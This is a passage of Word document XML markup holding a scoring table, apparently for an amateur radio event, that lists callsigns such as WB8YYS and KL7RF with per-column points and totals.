              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0A3EDD1A"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TOTAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="736" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="28B4D6D5"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100</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F5896" w:rsidRPr="001F5896" w14:paraId="62C969C0" w14:textId="77777777" w:rsidTr="00F7328A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1170" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4103F35A"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WB8YYS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4F9BA733"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40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="855" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="216A31C3"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24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="855" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0203BE57"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20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="969" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="64A9C16E"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5F6E9126"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2FC336C6"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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="912" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6F1906D8"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TOTAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="736" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2E288029"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94</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F5896" w:rsidRPr="001F5896" w14:paraId="78995F2A" w14:textId="77777777" w:rsidTr="00F7328A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1170" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="63EAE82E"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KL7RF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="45DA0919"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40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="855" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="589BDC7F"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40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="855" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6E66DADC"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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="969" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7AE72B3F"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1172FD83"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0374342E"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="912" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1C0274EC"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TOTAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="736" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="254C3BA8"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90</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F5896" w:rsidRPr="001F5896" w14:paraId="7302B104" w14:textId="77777777" w:rsidTr="00F7328A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1170" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2EE4C4DF"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K8KRA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1961672C"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40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="855" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="48BFB363"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40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="855" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7D51C3D7"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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="969" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="44D2F801"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6C812397"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="313F40E8"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="912" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="62A9D13B"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TOTAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="736" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="27CCB32E"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90</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F5896" w:rsidRPr="001F5896" w14:paraId="4F5A3530" w14:textId="77777777" w:rsidTr="00F7328A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1170" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="494DE754"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N8MRS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4CB06B8A"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40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="855" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="271A67CC"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40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="855" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3B0CCEB5"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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="969" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7562C82C"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="69A638B1"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="28D9D01E"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="912" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4711E55E"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TOTAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="736" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="14991228"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90</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F5896" w:rsidRPr="001F5896" w14:paraId="2F8B2A19" w14:textId="77777777" w:rsidTr="00F7328A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1170" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="52B7562B"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KB8HJJ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5E718064"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40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="855" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="43577530"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40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="855" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0D378BC1"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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="969" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="26F9325F"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="410E3663"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="59493F91"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="912" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6A188214"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TOTAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="736" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="49432264"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90</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F5896" w:rsidRPr="001F5896" w14:paraId="715F6B4A" w14:textId="77777777" w:rsidTr="00F7328A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1170" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="08DADDC6"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W8GSR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4F7A9C7E"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40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="855" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2DD26404"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40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="855" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7B53C9E9"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="969" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5875F564"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4053E002"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6CC58F08"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="912" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="720D0BBB"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TOTAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="736" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7987FF70"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80</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F5896" w:rsidRPr="001F5896" w14:paraId="378403E4" w14:textId="77777777" w:rsidTr="00F7328A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1170" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="74A3DC9B"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KA1G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4D5327B6"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40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="855" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0A273F45"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20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="855" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1EB2FEDA"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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="969" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="53E7C14B"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7CEF3AC0"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="00ADD629"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
